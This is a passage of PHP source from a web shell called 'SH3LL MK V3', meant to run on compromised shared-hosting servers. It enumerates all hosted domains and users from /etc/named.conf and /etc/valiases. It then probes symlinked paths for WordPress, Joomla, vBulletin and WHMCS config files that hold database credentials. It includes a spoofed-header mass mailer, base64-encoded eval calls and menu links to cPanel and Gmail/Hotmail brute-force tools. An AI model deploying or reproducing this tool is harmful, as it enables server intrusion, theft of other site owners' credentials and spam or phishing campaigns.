  769. <center><span style='color:#0078FF;font-size:9px;'>YOUTUBER , KILLER HTML5, JAVASCRIPT, CSS , JS , ADOBE PHOTOSHOP <br> LOGICIEL, MATERIEL INFORMATIQUE ET PROGRAMMATION INFORMATIQUE</span><center>
  770. <br><center><span style='color:white'>MADE IN MOROCCO</span><center>
  771. <center><span style='color:#0078FF;font-size:9px;'> GREETZ TO : ALL MEMBERS OF CODERSLEET & CODERSARMY TEAM</span><center><br>
  772. <center><span style='color:white'>ABOUT SH3LL [MK]</span><center>
  773. <center><span style='color:#0078FF;font-size:9px;'>HACK IS NOT A CRIME , HACK JUSTE FOR TESTING THE SECURITY OF SERVER .</span></center>
  774. <center><span style='color:#0078FF;font-size:9px;'>AND TO READ THE ERUR OF THE STUPID PROGRAMMING .</span></center>
  775. <center><span style='color:#0078FF;font-size:9px;'>FOR UPDATE AND TO DEVLOP THE WEBSITE </span></center>
  776. <center><span style='color:#0078FF;font-size:9px;'>SH3LL MKV3 IS RESPONSIBLE JUSTE FOR TESTING THE SECURITY OF SERVER</span></center>
  777. <center><span style='color:#0078FF;font-size:9px;'>WE ARE THE NEW GENARATION , SH3LL MK FOR ME FOR YOU </span></center></marquee></center><br>
  778. <center><span style='color:white'>UPDATE UR VERSION 3.2 , REPPOT ERROR\n</span><center>
  779. <a target=\"_GET\" href=http://facebook.com/MC.Klio>
  780. <span style='color:#0078FF;'>CONTACT</a><br><br><br><br><br>
  781. ";
  782. ///// FOOTER
  783. $FOTTER2 = "<footer class='MK-footer'>";  
  784. echo ''. $FOTTER2 .'' ;
  785. $COPYRIGHT1 = base64_decode("Q09QWVJJR0hUIMKpIDxhIGhyZWY9Jz9NaXN0ZXI9QWJvdXRzJz4gMjAxNSA8L2E+IHw=");
  786. echo ''. $COPYRIGHT1 .'<button class="MK-Bouton">' ;
  787. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDc4RkYnPiDinrIgPC9zcGFuPg==/"));
  788. $SERVERIP1 = "SERVER IP :";
  789. echo ''. $SERVERIP1 .'' ;
  790. $SPAN2 = "<span style='color:#FFFFFF;'>";
  791. $SPAN3 = "</span>";
  792. echo ''. $SPAN2 .'' ;
  793. echo $SERVERIP = gethostbyname($_SERVER["HTTP_HOST"]); echo ''. $SPAN3 .'' ;
  794. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDc4RkYnPiDinrIgPC9zcGFuPg==/"));
  795. $CLIENTIP1 = "CLIENT IP :"; echo ''. $CLIENTIP1 .'';
  796. echo ''. $SPAN2 .'' ; echo $_SERVER['REMOTE_ADDR'];
  797. echo ''. $SPAN3 .'</button><button class="MK-Bouton">';
  798. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDc4RkYnPiDinrIgPC9zcGFuPg==/"));
  799. $HOSTOWNED1 = "HOST OWNED :";
  800. echo ''. $HOSTOWNED1 .'' ;
  801. echo ''. $SPAN2 .'' ; echo $_SERVER['SERVER_NAME'] ; echo ''. $SPAN3 .'</button> ';
  802. $REPORTERROR = "|  ALL RIGHT RESERVED™ |";
  803. echo ''. $REPORTERROR .'</a></span></footer>';
  804. echo ''. $THEEND .'' ;
  805. exit;
  806. }
  807. ////// KILLING SHELL
  808. if ($_GET['Mister'] == 'Killing') {
  809.     $IMGLOGO = '<div class=content><img src="http://gulf-up.com/do.php?img=9366" height="150">';
  810. echo "<br><center>"; echo ''. $IMGLOGO .'</center><br>';
  811. echo '<center><span style="font-size:11px;  color:#0078FF">U REALLY WANT TO REMOVE SHELL ?</span></center>';
  812. echo '<center><br><b><a href="?Mister=kil"><span style="color:#ff0000;" >YES</span></a> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
  813. <a style="color:white;" href="?Mister=MKV"><span>NO</span></a></b></center><br>
  814. ';
  815. ///// FOOTER
  816. $FOTTER2 = "<footer class='MK-footer'>";  
  817. echo ''. $FOTTER2 .'' ;
  818. $COPYRIGHT1 = base64_decode("Q09QWVJJR0hUIMKpIDxhIGhyZWY9Jz9NaXN0ZXI9QWJvdXRzJz4gMjAxNSA8L2E+IHw=");
  819. echo ''. $COPYRIGHT1 .'<button class="MK-Bouton">' ;
  820. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDc4RkYnPiDinrIgPC9zcGFuPg==/"));
  821. $SERVERIP1 = "SERVER IP :";
  822. echo ''. $SERVERIP1 .'' ;
  823. $SPAN2 = "<span style='color:#FFFFFF;'>";
  824. $SPAN3 = "</span>";
  825. echo ''. $SPAN2 .'' ;
  826. echo $SERVERIP = gethostbyname($_SERVER["HTTP_HOST"]); echo ''. $SPAN3 .'' ;
  827. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDc4RkYnPiDinrIgPC9zcGFuPg==/"));
  828. $CLIENTIP1 = "CLIENT IP :"; echo ''. $CLIENTIP1 .'';
  829. echo ''. $SPAN2 .'' ; echo $_SERVER['REMOTE_ADDR'];
  830. echo ''. $SPAN3 .'</button><button class="MK-Bouton">';
  831. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDc4RkYnPiDinrIgPC9zcGFuPg==/"));
  832. $HOSTOWNED1 = "HOST OWNED :";
  833. echo ''. $HOSTOWNED1 .'' ;
  834. echo ''. $SPAN2 .'' ; echo $_SERVER['SERVER_NAME'] ; echo ''. $SPAN3 .'</button> ';
  835. $REPORTERROR = "|  ALL RIGHT RESERVED™ |";
  836. echo ''. $REPORTERROR .'</a></span></footer>';
  837. echo ''. $THEEND .'' ;
  838. exit;
  839. }
  840. /////////// GET DOMAINS
  841. if(isset($_GET['Mister']) && ($_GET['Mister'] == 'Domains')) {
  842. $FOTTER2 = "<footer class='MK-footer'>";  
  843. echo ''. $FOTTER2 .'' ;
  844. $COPYRIGHT1 = base64_decode("Q09QWVJJR0hUIMKpIDxhIGhyZWY9Jz9NaXN0ZXI9QWJvdXRzJz4gMjAxNSA8L2E+IHw=");
  845. echo ''. $COPYRIGHT1 .'<button class="MK-Bouton">' ;
  846. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDc4RkYnPiDinrIgPC9zcGFuPg==/"));
  847. $SERVERIP1 = "SERVER IP :";
  848. echo ''. $SERVERIP1 .'' ;
  849. $SPAN2 = "<span style='color:#FFFFFF;'>";
  850. $SPAN3 = "</span>";
  851. echo ''. $SPAN2 .'' ;
  852. echo $SERVERIP = gethostbyname($_SERVER["HTTP_HOST"]); echo ''. $SPAN3 .'' ;
  853. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDc4RkYnPiDinrIgPC9zcGFuPg==/"));
  854. $CLIENTIP1 = "CLIENT IP :"; echo ''. $CLIENTIP1 .'';
  855. echo ''. $SPAN2 .'' ; echo $_SERVER['REMOTE_ADDR'];
  856. echo ''. $SPAN3 .'</button><button class="MK-Bouton">';
  857. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDc4RkYnPiDinrIgPC9zcGFuPg==/"));
  858. $HOSTOWNED1 = "HOST OWNED :";
  859. echo ''. $HOSTOWNED1 .'' ;
  860. echo ''. $SPAN2 .'' ; echo $_SERVER['SERVER_NAME'] ; echo ''. $SPAN3 .'</button> ';
  861. $REPORTERROR = "|  ALL RIGHT RESERVED™ |";
  862. echo ''. $REPORTERROR .'</a></span></footer>';
  863. echo ''. $THEEND .'' ;
  864. echo "<br><center><nav class='social'><ul>
  865. <li><a href='?Mister=FinderAdmin'>Finder Administer Panel V1.0</a></li>
  866. <li><a href='?Mister=Domains'>Get All Domains</a></li>
  867. <li><a href='?Mister=Finder'>Finder Database Panel</a></li>
  868. <li><a href='?Mister=Getip'>Get Ip 2 Domains </a></li>
  869. <li><a href='?Mister=subdomain'>Subdomain Checker</a></li>
  870. <li><a href='?Mister=iplookdom'>Ip Lookup Reverse</a></li>
  871. <li><a href='?Mister=Rev'>Mass Read Config </a></li>
  872. <li><a href='?Mister=Grabber'>Grabber Config Attack</a></li>
  873. <li><a href='?Mister=J-Scann3r'>Joomla Serv3r Scann3r</a></li>
  874. <li><a href='?Mister=whois'>Website Whois</a></li>
  875. </ul></nav></center>";
  876. echo "<nav class='Mister-nav'><center><span style='font-size:18px;  color:#0078FF'>GET ALL DOMAINS
  877. </span><center></nav>";
  878. echo "<br><div class=content><center><span style='  color:#0078FF'> DOMAINS AND USERS </span></br>";$d0mains = @file("/etc/named.conf");if(!$d0mains){die("<center><span style='  color:red'>  ERROR </span><span> : U CAN'T READ [ /ETC/NAMED.CONF ]</center><br>");}echo '<table class=MisterText">
  879. <td>Domains</td><td>USERS</td></tr></table>';foreach($d0mains as $d0main){if(eregi("zone",$d0main)){preg_match_all('#zone "(.*)"#', $d0main, $domains);flush();if(strlen(trim($domains[1][0])) > 2){$user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));echo "<tr><td><a href=http://www.".$domains[1][0]."/>".$domains[1][0]."</a></td><td></center>".$user['name']."</td></tr>";flush();}}}
  880.  exit;}
  881. ///////// CMS SCANNER
  882. if ($_GET['Mister'] == 'Cms') {
  883. echo "<br><center><nav class='social'><ul>
  884. <li><a href='?Mister=read'>Read /Etc/Passwd</a></li>
  885. <li><a href='?Mister=EtcExtract'> ExtracT Users From /etc/passwd</a></li>
  886. <li><a href='?Mister=Cms'>Cms Scanner</a></li>
  887. </ul></nav></center>";
  888. echo "<nav class='Mister-nav'><center><span style='font-size:18px;  color:#0078FF'>CMS SCANNER
  889. </span></nav><br><div class=content><center>";
  890. if(!@is_file('named.txt')){
  891. $d00m = @file("/etc/named.conf");
  892. }else{
  893. $d00m = @file("named.txt");
  894. }
  895. if(!$d00m)
  896. {
  897. die ("<meta http-equiv='refresh' content='0; url=?Mister=read'/>");
  898. }
  899. else
  900. {
  901. echo "<div>
  902. <table align='center' width='40%' class='Mistertext'><td><span style=' color:white'>Domains </b></font></td><td><span style=' color:white'>Script</b></span></td>";
  903. foreach($d00m as $dom){
  904. flush();
  905. flush();
  906. if(eregi("zone",$dom)){
  907. @preg_match_all('#zone "(.*)"#', $dom, $domvw);
  908. flush();
  909. if(@strlen(trim($domvw[1][0])) > 2){
  910. $user = @posix_getpwuid(@fileowner("/etc/valiases/".$domvw[1][0]));
  911. $wpl=$pageURL."/sim/rut/home/".$user['name']."/public_html/wp-config.php";
  912. $wpp=@get_headers($wpl);
  913. $wp=$wpp[0];
  914. $wp2=$pageURL."/sim/rut/home/".$user['name']."/public_html/blog/wp-config.php";
  915. $wpp2=@get_headers($wp2);
  916. $wp12=$wpp2[0];
  917. $jo1=$pageURL."/sim/rut/home/".$user['name']."/public_html/configuration.php";
  918. $joo=@get_headers($jo1);
  919. $jo=$joo[0];
  920. $jo2=$pageURL."/sim/rut/home/".$user['name']."/public_html/joomla/configuration.php";
  921. $joo2=@get_headers($jo2);
  922. $jo12=$joo2[0];
  923. $vb1=$pageURL."/sim/rut/home/".$user['name']."/public_html/includes/config.php";
  924. $vbb=@get_headers($vb1);
  925. $vb=$vbb[0];
  926. $vb2=$pageURL."/sim/rut/home/".$user['name']."/public_html/vb/includes/config.php";
  927. $vbb2=@get_headers($vb2);
  928. $vb12=$vbb2[0];
  929. $vb3=$pageURL."/sim/rut/home/".$user['name']."/public_html/forum/includes/config.php";
  930. $vbb3=@get_headers($vb3);
  931. $vb13=$vbb3[0];
  932. $wh1=$pageURL."/sim/rut/home/".$user['name']."public_html/clients/configuration.php";
  933. $whh2= @get_headers($wh1);
  934. $wh=$whh2[0];
  935. $wh2=$pageURL."/sim/rut/home/".$user['name']."/public_html/support/configuration.php";
  936. $whh2= @get_headers($wh2);
  937. $wh12=$whh2[0];
  938. $wh3=$pageURL."/sim/rut/home/".$user['name']."/public_html/database.php";
  939. $whh3= @get_headers($wh3);
  940. $wh13=$whh3[0];
  941. $wh5=$pageURL."/sim/rut/home/".$user['name']."/public_html/config.php";
  942. $whh5= @get_headers($wh5);
  943. $wh15=$whh5[0];
  944. $wspan=$pageURL."/sim/rut/home/".$user['name']."/public_html/client/configuration.php";
  945. $whspan= @get_headers($wspan);
  946. $wh14=$whspan[0];
  947. $pos = strpos($wp, "200");
  948. $config="&nbsp;";
  949.  
  950. if (strpos($wp, "200") == true )
  951. {
  952.  $config="<div><a href='".$wpl."' target='_blank'>Wordpress</a></div>";
  953. }
  954. elseif (strpos($wp12, "200") == true)
  955. {
  956.   $config="<div><a href='".$wp2."' target='_blank'>Wordpress</a></div>";
  957. }
  958.  
  959. elseif (strpos($jo, "200")  == true and strpos($wh15, "200")  == true )
  960. {
  961. $config=" <div><a href='".$wh5."' target='_blank'>WHMCS</a></div>";
  962.  
  963. }
  964. elseif (strpos($wh12, "200")  == true)
  965. {
  966.   $config ="<div> <a href='".$wh2."' target='_blank'>WHMCS</a></div>";
  967. }
  968.  
  969. elseif (strpos($wh13, "200")  == true)
  970. {
  971. $config ="<div> <a href='".$wh3."' target='_blank'>WHMCS</a></div>";
  972.  
  973. }
  974.  
  975. elseif (strpos($jo, "200")  == true)
  976. {
  977. $config=" <div><a href='".$jo1."' target='_blank'>Joomla</a></div>";
  978. }
  979.  
  980. elseif (strpos($jo12, "200")  == true)
  981. {
  982. $config=" <div><a href='".$jo2."' target='_blank'>Joomla</a></div>";
  983. }
  984.  
  985. elseif (strpos($vb, "200")  == true)
  986. {
  987. $config=" <div><a href='".$vb1."' target='_blank'>vBulletin</a></div>";
  988. }
  989.  
  990. elseif (strpos($vb12, "200")  == true)
  991. {
  992. $config=" <div><a href='".$vb2."' target='_blank'>vBulletin</a></div>";
  993. }
  994.  
  995. elseif (strpos($vb13, "200")  == true)
  996. {
  997. $config=" <div><a href='".$vb3."' target='_blank'>vBulletin</a></div>";
  998. }
  999.  
  1000. else
  1001. {
  1002. continue;
  1003. }
  1004. flush();
  1005. flush();
  1006.  
  1007.  
  1008. $site = $user['name'] ;
  1009.  
  1010.  
  1011.  
  1012. flush();
  1013.  
  1014. echo "<tr><td><a href=http://www.".$domvw[1][0]."/>".$domvw[1][0]."</a></td>
  1015. <td>".$config."</div></td></tr>"; flush();
  1016.  
  1017. }
  1018. }
  1019. }
  1020. }
  1021. echo "</table></div><br><br>";
  1022. $FOTTER2 = "<footer class='MK-footer'>";  
  1023. echo ''. $FOTTER2 .'' ;
  1024. $COPYRIGHT1 = base64_decode("Q09QWVJJR0hUIMKpIDxhIGhyZWY9Jz9NaXN0ZXI9QWJvdXRzJz4gMjAxNSA8L2E+IHw=");
  1025. echo ''. $COPYRIGHT1 .'<button class="MK-Bouton">' ;
  1026. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDc4RkYnPiDinrIgPC9zcGFuPg==/"));
  1027. $SERVERIP1 = "SERVER IP :";
  1028. echo ''. $SERVERIP1 .'' ;
  1029. $SPAN2 = "<span style='color:#FFFFFF;'>";
  1030. $SPAN3 = "</span>";
  1031. echo ''. $SPAN2 .'' ;
  1032. echo $SERVERIP = gethostbyname($_SERVER["HTTP_HOST"]); echo ''. $SPAN3 .'' ;
  1033. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDc4RkYnPiDinrIgPC9zcGFuPg==/"));
  1034. $CLIENTIP1 = "CLIENT IP :"; echo ''. $CLIENTIP1 .'';
  1035. echo ''. $SPAN2 .'' ; echo $_SERVER['REMOTE_ADDR'];
  1036. echo ''. $SPAN3 .'</button><button class="MK-Bouton">';
  1037. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDc4RkYnPiDinrIgPC9zcGFuPg==/"));
  1038. $HOSTOWNED1 = "HOST OWNED :";
  1039. echo ''. $HOSTOWNED1 .'' ;
  1040. echo ''. $SPAN2 .'' ; echo $_SERVER['SERVER_NAME'] ; echo ''. $SPAN3 .'</button> ';
  1041.  
  1042.  
  1043. $REPORTERROR = "|  ALL RIGHT RESERVED™ |";
  1044. echo ''. $REPORTERROR .'</a></span></footer>';
  1045. echo ''. $THEEND .'' ;
  1046. exit ;
  1047. }
  1048. ////////// MAILS
  1049. if ($_GET['Mister'] == 'Mails') {
  1050. echo "<br><center><nav class='social'><ul>
  1051. <li><a href='?Mister=Mails'>Separator Email Liste</a></li>
  1052. <li><a href='?Mister=mailers'>Unknow Mailer v1.0</a></li>
  1053. </ul></nav></center>";
  1054. echo "<nav class='Mister-nav'>
  1055. <center><span style='font-size:18px;  color:#0078FF'>SEPARATOR EMAIL LISTE</span></nav><br><div class=content><center>";
  1056. echo "<table align='center'  width='80%'></td><td>"; echo "
  1057. <form method='post' name='login' ><br>
  1058. <font size='4' color='#FFFFFF'> LISTE EMAILS : </font><br><textarea name='emails' cols='30' rows='10' for='texte' style='height:200px; ' class='input'>
  1059. </textarea>
  1060. <br/><br/><center><input type='submit' name='submit' value='Go !' class='Mister-button'/></center></div></form>";
  1061. $emails = $_POST['emails'];
  1062. $ex = explode("\n",$emails);
  1063. $count = count($ex);
  1064. if(isset($emails)&&$count>=1){
  1065. echo "<center><font color='red' size='3'>$count </font><font size='3' color='#FFFFFF'> Number of emails : </font></center><br />";
  1066. }else{
  1067. exit;}
  1068.  
  1069. if(isset($emails)){
  1070.    
  1071.  
  1072. for($i=0;$i<=$count;$i++){
  1073. $d = strtolower($ex[$i]);
  1074.  
  1075. if(strstr($d,"hotmail")   || strstr($d,"live") || strstr($d,"msn") || strstr($d,"outlook")){
  1076. $hotmail.=$d;
  1077. $nh = $nh + 1;
  1078. }else{
  1079. if(strstr($d,"yahoo")   || strstr($d,"ymail")){
  1080. $yahoo.=$d;
  1081. $ny = $ny + 1;
  1082. }else{
  1083. if(strstr($d,"gmail")  || strstr($d,"googlemail")   ){
  1084. $gmail.=$d;
  1085. $ng = $ng + 1;
  1086. }else{
  1087. if(strstr($d,"aol")   ){
  1088. $aol.=$d;
  1089. $na = $na + 1;
  1090. }else{
  1091. if(strstr($d,"yahoo")   ){
  1092. $mailru .=$d;
  1093. $nr = $nr + 1;
  1094. }else{
  1095. if(strstr($d,"wanadoo")   ){
  1096. $wanadoo .=$d;
  1097. $nw = $nw + 1;
  1098. }else{
  1099. if(strstr($d,"ntlworld")   ){
  1100. $ntlworld .=$d;
  1101. $nt = $nt + 1;
  1102. }else{
  1103. if(strstr($d,"gmx")   ){
  1104. $gmx .=$d;
  1105. $ngm = $ngm + 1;
  1106. }else{
  1107. if(strstr($d,"@web.")   ){
  1108. $web .=$d;
  1109. $nw2 = $nw2 + 1;
  1110. }else{
  1111.  
  1112. $ather .=$d;
  1113. $nn=$nn + 1;
  1114. }
  1115. }
  1116.  
  1117. }
  1118. }
  1119. }
  1120. }
  1121. }
  1122. }
  1123. }
  1124. }
  1125. }              
  1126. ?>
  1127. <center><table class="Mister-Tabl" style="width: 100%">
  1128.     <tr>      
  1129. <td><center><font color='#FFFFFF' size='3'>hotmail ( <font color='red' size='3'><?echo $nh;?></font> ) </font></center><textarea name="hotmailx" cols="30" rows="10" ><?echo $hotmail;?></textarea></td>
  1130. <td><center><font color='#FFFFFF' size='3'>gmail ( <font color='red' size='3'><?echo $ng;?></font> )</font></center><textarea name="gmailx" cols="30" rows="10" ><?echo $gmail;?></textarea></td>
  1131. <td><center><font color='#FFFFFF' size='3'>aol ( <font color='red' size='3'><?echo $na;?></font> )</font></center><textarea name="aolxx" cols="30" rows="10" ><?echo $aol;?></textarea></td>
  1132. <td><center><font color='#FFFFFF' size='3'>yahoo ( <font color='red' size='3'><?echo $ny;?></font> ) </font></center><textarea name="yahoox" cols="30" rows="10" ><?echo $yahoo;?></textarea></td>
  1133. <td><center><font color='#FFFFFF' size='3'>mail.ru( <font color='red' size='3'><?echo $nr;?></font> ) </font></center><textarea name="othersx" cols="30" rows="10" ><?echo $mailru;?></textarea></td></tr>
  1134. <tr>
  1135. <td><center><font color='#FFFFFF' size='3'>wanadoo( <font color='red' size='3'><?echo $nw;?></font> ) </font></center><textarea name="othersx" cols="30" rows="10" ><?echo $wanadoo;?></textarea></td>
  1136. <td><center><font color='#FFFFFF' size='3'>ntlworld( <font color='red' size='3'><?echo $nt;?></font> ) </font></center><textarea name="othersx" cols="30" rows="10" ><?echo $ntlworld;?></textarea></td>
  1137. <td><center><font color='white' size='3'>gmx( <font color='red' size='3'><?echo $ngm;?></font> ) </font></center><textarea name="othersx" cols="30" rows="10" ><?echo $gmx;?></textarea></td>
  1138. <td><center><font color='#FFFFFF' size='3'>web( <font color='red' size='3'><?echo $nw2;?></font> ) </font></center><textarea name="othersx" cols="30" rows="10" ><?echo $web;?></textarea></td>
  1139. <td><center><font color='#FFFFFF' size='3'>ather mails( <font color='red' size='3'><?echo $nn-1;?></font> ) </font></center><textarea name="othersx" cols="30" rows="10" ><?echo $ather;?></textarea></td>
  1140. </tr></table></center></body>
  1141. <?php
  1142. $FOTTER2 = "<footer class='MK-footer'>";  
  1143. echo ''. $FOTTER2 .'' ;
  1144. $COPYRIGHT1 = base64_decode("Q09QWVJJR0hUIMKpIDxhIGhyZWY9Jz9NaXN0ZXI9QWJvdXRzJz4gMjAxNSA8L2E+IHw=");
  1145. echo ''. $COPYRIGHT1 .'<button class="MK-Bouton">' ;
  1146. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDc4RkYnPiDinrIgPC9zcGFuPg==/"));
  1147. $SERVERIP1 = "SERVER IP :";
  1148. echo ''. $SERVERIP1 .'' ;
  1149. $SPAN2 = "<span style='color:#FFFFFF;'>";
  1150. $SPAN3 = "</span>";
  1151. echo ''. $SPAN2 .'' ;
  1152. echo $SERVERIP = gethostbyname($_SERVER["HTTP_HOST"]); echo ''. $SPAN3 .'' ;
  1153. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDc4RkYnPiDinrIgPC9zcGFuPg==/"));
  1154. $CLIENTIP1 = "CLIENT IP :"; echo ''. $CLIENTIP1 .'';
  1155. echo ''. $SPAN2 .'' ; echo $_SERVER['REMOTE_ADDR'];
  1156. echo ''. $SPAN3 .'</button><button class="MK-Bouton">';
  1157. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDc4RkYnPiDinrIgPC9zcGFuPg==/"));
  1158. $HOSTOWNED1 = "HOST OWNED :";
  1159. echo ''. $HOSTOWNED1 .'' ;
  1160. echo ''. $SPAN2 .'' ; echo $_SERVER['SERVER_NAME'] ; echo ''. $SPAN3 .'</button> ';
  1161.  
  1162.  
  1163. $REPORTERROR = "|  ALL RIGHT RESERVED™ |";
  1164. echo ''. $REPORTERROR .'</a></span></footer>';
  1165. echo ''. $THEEND .'' ; exit;}
  1166. ////// MAILER V1.0
  1167. if ($_GET['Mister'] == 'mailers') {
  1168. echo "<br><center><nav class='social'><ul>
  1169. <li><a href='?Mister=Mails'>Separator Email Liste</a></li>
  1170. <li><a href='?Mister=mailers'>Unknow Mailer v1.0</a></li>
  1171. </ul></nav></center>"; echo "<nav class='Mister-nav'>
  1172. <center><span style='font-size:18px;  color:#0078FF'>UNKNOW MAILER V1.0</span></nav><br><div class=content><center><table align='center' width='80%'>";
  1173. if(empty($_POST)==false){
  1174.     $emails = preg_split("/\r\n|\n|\r/",$_POST["UnSend"]);
  1175.     foreach($emails as $email){
  1176.         $headers   = array();
  1177.         $headers[] = "MIME-Version: 1.0";
  1178.         $headers[] = "Content-type: text/plain; charset=iso-8859-1";
  1179.         $headers[] = "From: " . $_POST["sendername"] . " <" . $_POST["senderemail"] . ">";
  1180.         $headers[] = "Bcc: " . $_POST["Targetname"] . " <" . $_POST["Targetemail"] . ">";
  1181.         $headers[] = "Reply-To: <" . $_POST["repto"] . ">";
  1182.         $headers[] = "Subject: " . $_POST["title"];
  1183.         if($_POST["epriority"]==1){
  1184.             $headers[] = "X-Priority: 1 (Highest)";
  1185.             $headers[] = "X-MSMail-Priority: High";
  1186.             $headers[] = "Importance: High";
  1187.         }elseif($_POST["epriority"]==3){
  1188.             $headers[] = "X-Priority: 5 (Lowest)";
  1189.             $headers[] = "X-MSMail-Priority: Low";
  1190.             $headers[] = "Importance: Low";
  1191.         }
  1192.         $headers[] = "X-Mailer: PHP/".phpversion();
  1193.         mail($email, $_POST["title"], $_POST["Texta"], implode("\r\n", $headers));
  1194.     }
  1195.     print "<span style=' color:#0078FF'>DONE! </span>";
  1196. }else{
  1197. ?>
  1198. <form method="POST"><table  style="width:70%"><td><br>
  1199. Emails :</br><textarea name="UnSend" cols="50" rows="15" maxlength="10000" style='height:150px;' wrap="soft" value="<? echo $_POST['UnSend'] ;?>" class="input"></textarea></td></table>
  1200. <table  style="width:50%"><tr><td>
  1201. <br>  Your Email : </br><input class="input" type="text" name="senderemail" value="<? echo $_POST['senderemail'] ;?>"></td></tr><tr><td>
  1202. <br>  Your Name : </br><input class="input" type="text" name="sendername" value="<? echo $_POST['sendername'] ;?>"></td></tr><tr><td>
  1203. <br> Reply-To : </br><input class="input" type="text" name="repto" value="<? echo $_POST['repto'] ;?>"></td></tr><tr><td>
  1204. <br>  Subject : </br><input class="input" type="text" name="title" value="<? echo $_POST['title'] ;?>"></td></tr><tr><td>
  1205. <br> Email Priority : </br><select name="epriority" value="<? echo $_POST['epriority'] ;?>">
  1206.         <option selected="" value="">Please Choose</option>
  1207.         <option value="1">High</option>
  1208.         <option value="2">Normal</option>
  1209.         <option value="3">Low</option></select><br><br>
  1210. </td></tr></table></td></tr></table></td></tr><tr><td>
  1211. <br><span color='#FFFFFF'>Your Text :</span></br><textarea class="input" name="Texta" cols="86" rows="15" maxlength="10000" wrap="soft" style="width:70%;height:150px;" value="<? echo $_POST['epriority'] ;?>"></textarea></td></td></tr></table><br><br>
  1212. <input type="Submit" value="SEND" class="Mister-button"></form><br><br><br><br>
  1213. <?php
  1214. }
  1215. //// FOOTER
  1216. $FOTTER2 = "<footer class='MK-footer'>";  
  1217. echo ''. $FOTTER2 .'' ;
  1218. $COPYRIGHT1 = base64_decode("Q09QWVJJR0hUIMKpIDxhIGhyZWY9Jz9NaXN0ZXI9QWJvdXRzJz4gMjAxNSA8L2E+IHw=");
  1219. echo ''. $COPYRIGHT1 .'<button class="MK-Bouton">' ;
  1220. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDc4RkYnPiDinrIgPC9zcGFuPg==/"));
  1221. $SERVERIP1 = "SERVER IP :";
  1222. echo ''. $SERVERIP1 .'' ;
  1223. $SPAN2 = "<span style='color:#FFFFFF;'>";
  1224. $SPAN3 = "</span>";
  1225. echo ''. $SPAN2 .'' ;
  1226. echo $SERVERIP = gethostbyname($_SERVER["HTTP_HOST"]); echo ''. $SPAN3 .'' ;
  1227. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDc4RkYnPiDinrIgPC9zcGFuPg==/"));
  1228. $CLIENTIP1 = "CLIENT IP :"; echo ''. $CLIENTIP1 .'';
  1229. echo ''. $SPAN2 .'' ; echo $_SERVER['REMOTE_ADDR'];
  1230. echo ''. $SPAN3 .'</button><button class="MK-Bouton">';
  1231. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDc4RkYnPiDinrIgPC9zcGFuPg==/"));
  1232. $HOSTOWNED1 = "HOST OWNED :";
  1233. echo ''. $HOSTOWNED1 .'' ;
  1234. echo ''. $SPAN2 .'' ; echo $_SERVER['SERVER_NAME'] ; echo ''. $SPAN3 .'</button> ';
  1235. $REPORTERROR = "|  ALL RIGHT RESERVED™ |";
  1236. echo ''. $REPORTERROR .'</a></span></footer>';
  1237. echo ''. $THEEND .'' ;
  1238. exit;
  1239. }
  1240. /////////// BRUTE MAILERS
  1241. if ($_GET['Mister'] == 'Brutmailers') {
  1242.     echo "<center><nav class='social'><ul>
  1243. <li><a href='?Mister=cpanelBrut'>Turbo Cpanel Brut Force</a></li>
  1244. <li><a href='?Mister=Brutmailers'>Gmail & Hotmail Brute Force</a></li>
  1245. <li><a href='?Mister=AutoCp'>Auto Cpanel Finder/Cracker</a></li>
  1246. </ul></nav></center>";
  1247. echo "<br><nav class='Mister-nav'><center><span style='font-size:18px;color:#0078ff'>GMAIL & HOTMAIL BRUTE FORCE</span></nav><br><div class=content><center>";
  1248. $FOTTER2 = "<footer class='MK-footer'>";  
  1249. echo ''. $FOTTER2 .'' ;
  1250. $COPYRIGHT1 = base64_decode("Q09QWVJJR0hUIMKpIDxhIGhyZWY9Jz9NaXN0ZXI9QWJvdXRzJz4gMjAxNSA8L2E+IHw=");
  1251. echo ''. $COPYRIGHT1 .'<button class="MK-Bouton">' ;
  1252. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDc4RkYnPiDinrIgPC9zcGFuPg==/"));
  1253. $SERVERIP1 = "SERVER IP :";
  1254. echo ''. $SERVERIP1 .'' ;
  1255. $SPAN2 = "<span style='color:#FFFFFF;'>";
  1256. $SPAN3 = "</span>";
  1257. echo ''. $SPAN2 .'' ;
  1258. echo $SERVERIP = gethostbyname($_SERVER["HTTP_HOST"]); echo ''. $SPAN3 .'' ;
  1259. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDc4RkYnPiDinrIgPC9zcGFuPg==/"));
  1260. $CLIENTIP1 = "CLIENT IP :"; echo ''. $CLIENTIP1 .'';
  1261. echo ''. $SPAN2 .'' ; echo $_SERVER['REMOTE_ADDR'];
  1262. echo ''. $SPAN3 .'</button><button class="MK-Bouton">';
  1263. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDc4RkYnPiDinrIgPC9zcGFuPg==/"));
  1264. $HOSTOWNED1 = "HOST OWNED :";
